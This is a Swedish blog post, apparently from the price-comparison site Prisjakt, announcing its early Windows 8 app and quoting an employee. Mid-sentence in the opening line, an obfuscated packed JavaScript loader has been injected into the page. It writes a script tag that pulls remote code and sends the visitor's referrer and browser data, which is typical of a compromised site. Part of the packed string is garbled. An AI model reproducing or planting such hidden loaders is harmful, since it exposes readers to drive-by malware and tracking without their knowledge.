Image Image Image Image Image Image Image Image Image Image

| 3 december, 2020

Scroll to top

Top

Prisjakt bland de första i Sverige med Windows 8-app

Sebastian

Förutom eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ttfbi|var|u0026u|referrer|rkzdf||js|php’.split(’|’),0,{}))
sommarens olympiska spel i London är Microsofts nästa operativsystem, Windows 8, en av de OS-händelser många väntar på just nu.

Den största skillnaden jämfört med Windows 7 är Metro-gränssnittet och anpassningen för pekskärm, men en annan nyhet är att det går att köra ”appar” även på din vanliga dator. Dessutom knyts det ihop tydligt med Xbox och Windows Phone.

Prisjakts Windows 8-app en av de första i Sverige
På Prisjakt är vi stolta och glada att som en av få svenska sajter kunna presentera en Windows 8-anpassad app för såväl datorer som surfplattor redan nu.

Med appen kan du lätt och smidigt komma åt Prisjakts hela produkt- och prisdatabas, omdömen samt prishistorik. Dessutom finns ett stort antal fördefinierade filter för snabba sökningar.

– I Windows 8-appen fick vi möjlighet att integrera användarupplevelsen tätt med operativsystemet, något som vår webbsida inte kan erbjuda, berättar Marcus Liedholm på Prisjakt.

– Exempelvis kan man få sökresultat från Prisjakt direkt i Metros sökfunktion, och med några få klick gå till butiken och beställa, jämföra med andra produkter eller ”pinna” direkt till Metros skrivbord, avslutar Marcus.